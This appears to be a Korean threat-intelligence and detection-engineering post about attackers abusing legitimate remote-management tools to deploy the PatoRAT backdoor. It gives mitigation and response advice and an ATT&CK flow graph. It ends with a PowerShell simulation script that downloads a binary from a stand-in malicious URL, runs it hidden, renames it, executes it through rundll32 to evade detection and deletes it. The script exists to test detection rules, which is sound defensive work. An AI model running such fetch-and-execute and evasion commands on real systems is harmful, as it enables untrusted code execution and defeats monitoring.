팔로우
요약
위협 행위자들은 LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne, SuperOps와 같은 합법적인 원격 모니터링 및 관리(RMM) 도구를 악용하여 악성 코드를 배포하고 지속적인 원격 액세스를 설정하는 일이 증가하고 있습니다. 초기 전달은 종종 악성 다운로드 페이지나 피싱 이메일을 통해 이루어지며, 이후 PowerShell 기반 실행과 PatoRAT 백도어 같은 2차 페이로드의 배포가 이어집니다. 안랩 EDR은 이러한 RMM 유틸리티의 실행을 감지하고 의심스러운 후속 활동에 대한 행동 기반 경고를 생성할 수 있습니다. 이 보고서는 소프트웨어 출처 검증과 지속적인 엔드포인트 모니터링의 중요성을 강조합니다.
조사
안랩 보안 인텔리전스 센터는 공격자들이 RMM 설치 파일을 Notepad++, 7-Zip, Telegram과 같은 인기 있는 애플리케이션으로 위장하거나 마스킹하여 악성 웹사이트 또는 피싱 첨부파일을 통해 전달하는 여러 캠페인을 관찰했습니다. 설치 후 RMM 에이전트는 벤더 인프라에 등록되고, 그 후 PowerShell 페이로드를 실행하여 PatoRAT을 드롭했습니다. PDF 유인물을 통해 피싱으로 전달된 Syncro를 포함하여 여러 RMM 제품 전반에 유사한 작전이 나타났습니다. 안랩 EDR 탐지 로직은 이 합법적인 이진 파일들의 실행을 플래그하고 설치 후 행동과 상관관계시킬 수 있도록 개발되었습니다.
완화
RMM 소프트웨어를 환경에서 허용하기 전에 다운로드 소스를 검증하고, 코드 서명 인증서를 확인하며, 해시를 공식 벤더 릴리스와 비교하세요. 애플리케이션 허용 리스트를 시행하고, RMM 실행에 대한 명시적 승인을 요구하십시오. 예상치 못한 RMM 바이너리 실행, 이상한 PowerShell 활동, 승인되지 않은 경우 벤더 인프라 도메인과의 의심스러운 연결을 모니터링하십시오. 운영 체제와 보안 도구를 업데이트하여 노출을 줄이십시오.
응답
의심되는 RMM 실행이 감지되면 호스트를 격리하고, 포렌식 아티팩트를 수집하며, 승인되지 않은 바이너리를 제거하십시오. 원격 제어 채널을 차단하기 위해 도구의 인프라와의 아웃바운드 연결을 차단하고, PatoRAT 같은 2차 페이로드를 위해 전체 스캔을 수행하십시오. 탐지 내용을 업데이트하고, 빠른 분류를 위해 캠페인 패턴에 대해 SOC에 보고하십시오.
“graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef malware fill:#f9d5e5 %% Nodes node_initial_access[“<b>Action</b> – <b>T1204 User Execution</b>: 피해자가 합법적인 소프트웨어로 위장된 RMM 설치 프로그램을 다운로드하거나 악성 링크로 리디렉션되는 피싱 PDF 송장을 엽니다.”] class node_initial_access action node_masquerading[“<b>Technique</b> – <b>T1036.008 Masquerading</b>: 설치 프로그램과 PDF가 신뢰할 수 있는 유틸리티나 문서로 위조됩니다.”] class node_masquerading technique node_rmt_install[“<b>Tool</b> – <b>Name</b>: LogMeIn Resolve, PDQ Connect, Syncro, ScreenConnect, NinjaOne, SuperOps 등 원격 액세스 도구.”] class node_rmt_install tool node_powerShell[“<b>Technique</b> – <b>T1059.001 PowerShell</b>: 공격자는 RMM 플랫폼을 통해 PowerShell 명령을 실행하여 PatoRAT 백도어를 다운로드하고 설치합니다.”] class node_powerShell technique node_patoRAT[“<b>Malware</b> – <b>Name</b>: PatoRAT 백도어.”] class node_patoRAT malware node_software_deployment[“<b>Technique</b> – <b>T1072 소프트웨어 배포 도구</b>: RMM 솔루션은 추가 악성 페이로드를 푸시하고 지속성을 유지하는 데 활용됩니다.”] class node_software_deployment technique node_lateral_exploit[“<b>Technique</b> – <b>T1210 원격 서비스 악용</b>: 손상된 RMM 도구가 원격 세션을 열고 환경 내부를 횡단하는 데 사용됩니다.”] class node_lateral_exploit technique node_rdp_hijack[“<b>Technique</b> – <b>T1563.002 원격 서비스 세션 하이재킹</b>: 추가 호스트를 제어하기 위해 RDP 하이재킹이 수행됩니다.”] class node_rdp_hijack technique node_root_cert[“<b>Technique</b> – <b>T1553.004 루트 인증서 설치</b>: PowerShell 명령은 보안 제어를 피하기 위해 악성 루트 인증서를 설치합니다.”] class node_root_cert technique %% Connections node_initial_access u002du002d>|leads to| node_masquerading node_masquerading u002du002d>|leads to| node_rmt_install node_rmt_install u002du002d>|uses| node_powerShell node_powerShell u002du002d>|installs| node_patoRAT node_patoRAT u002du002d>|enables| node_software_deployment node_software_deployment u002du002d>|facilitates| node_lateral_exploit node_lateral_exploit u002du002d>|enables| node_rdp_hijack node_powerShell u002du002d>|executes| node_root_cert “
공격 흐름
시뮬레이션 실행
필수 조건: Telemetry 및 Baseline 사전 검사 패스가 통과해야 합니다.
이유: 이 섹션은 탐지 규칙을 트리거하도록 설계된 정밀한 적 기법(TTP) 실행을 자세히 설명합니다. 명령과 내러티브는 반드시 식별된 TTP를 직접 반영하고, 탐지 논리에 의해 예상되는 정확한 원격 측정을 생성하는 것을 목표로 해야 합니다. 추상적이거나 관련 없는 예는 잘못된 진단으로 이어질 수 있습니다.
-
공격 내러티브 및 명령:
공격자는 악성 첨부파일이 포함된 피싱 이메일을 전달합니다. 첨부파일이 실행되면 RMM 바이너리를 다운로드하는 PowerShell 스크립트를 실행합니다LogMeIn.exetoC:Temp. 이름 기반 탐지를 회피하기 위해, 공격자는 바이너리의 이름을 변경합니다tool.exe로 변경하고rundll32.exe(T1216) 을 통해 실행합니다. RMM 바이너리는 이후 공격자가 제어하는 C2 서버와 연락을 취하고 백도어 페이로드를 드롭합니다. 실행 후 공격자는 바이너리를 삭제하여 흔적을 은폐합니다 (T1542.004). -
회귀 테스트 스크립트:
# --------------------------------------------------------------- # RMM 도구 악용 시뮬레이션 (원래 이름) – 트리거해야 함 # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] 원래 RMM 바이너리 실행 중 (경고 예상)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # 우회 시뮬레이션 - 바이너리 이름 변경 및 프록시 실행 - 트리거하지 않아야 함 # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] rundll32를 통한 RMM 바이너리 이름 변경 후 실행 (우회)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # 아티팩트 정리 # --------------------------------------------------------------- Write-Host "[*] 바이너리 정리 중..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] 시뮬레이션 완료." -
정리 명령어:
# 남아있는 모든 프로세스가 종료되었는지 확인 Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # 다운로드된 파일 제거 (아직 존재하는 경우) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue